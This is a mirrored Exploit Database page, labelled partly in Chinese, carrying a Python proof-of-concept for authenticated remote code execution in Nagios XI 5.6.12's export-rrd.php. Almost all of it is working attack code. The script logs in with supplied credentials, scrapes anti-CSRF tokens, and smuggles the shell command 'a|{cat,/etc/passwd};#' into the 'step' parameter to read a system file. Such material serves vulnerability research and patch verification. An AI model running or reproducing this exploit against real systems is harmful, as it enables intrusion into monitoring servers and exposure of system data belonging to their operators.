Nagios XI 5.6.12 – ‘export-rrd.php’ Remote Code Execution

• Exploit Database
• 36 阅读

• 作者： Basim Alabdullah
  日期： 2020-07-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48640/

• # Exploit Title: Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution
  # Date: 2020-04-11
  # Exploit Author: Basim Alabdullah
  # Vendor homepage: https://www.nagios.com
  # Version: 5.6.12
  # Software link: https://www.nagios.com/downloads/nagios-xi/
  # Tested on: CentOS REDHAT 7.7.1908 (core)
  #
  # Authenticated Remote Code Execution
  #
  
  import requests
  import sys
  import re
  
  
  uname=sys.argv[2]
  upass=sys.argv[3]
  ipvictim=sys.argv[1]
  
  with requests.session() as s:
  urlz=ipvictim+"/login.php"
  headers = {
  'Accept-Encoding': 'gzip, deflate, sdch',
  'Accept-Language': 'en-US,en;q=0.8',
  'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
  'Referer': ipvictim+'/index.php',
  'Connection': 'keep-alive'
  }
  response = s.get(urlz, headers=headers)
  txt=response.text
  x=re.findall('var nsp_str = "(.*?)"', txt)
  for xx in x:
  login = {
  'username':uname,
  'password':upass,
  'nsp':xx,
  'page':'auth',
  'debug':'',
  'pageopt':'login',
  'redirect':ipvictim+'/index.php',
  'loginButton':''
  }
  rev=s.post(ipvictim+"/login.php",data=login , headers=headers)
  cmd=s.get(ipvictim+"/includes/components/ccm/?cmd=modify&type=host&id=1&page=1",allow_redirects=True)
  txt1=cmd.text
  xp=re.findall('var nsp_str = "(.*?)"', txt1)
  for xxp in xp:
  payload = "a|{cat,/etc/passwd};#"
  exploit=s.get(ipvictim+"/includes/components/xicore/export-rrd.php?host=localhost&service=Root%20Partition&start=011&end=012&step="+payload+"&type=a&nsp="+xxp)
  print(exploit.text)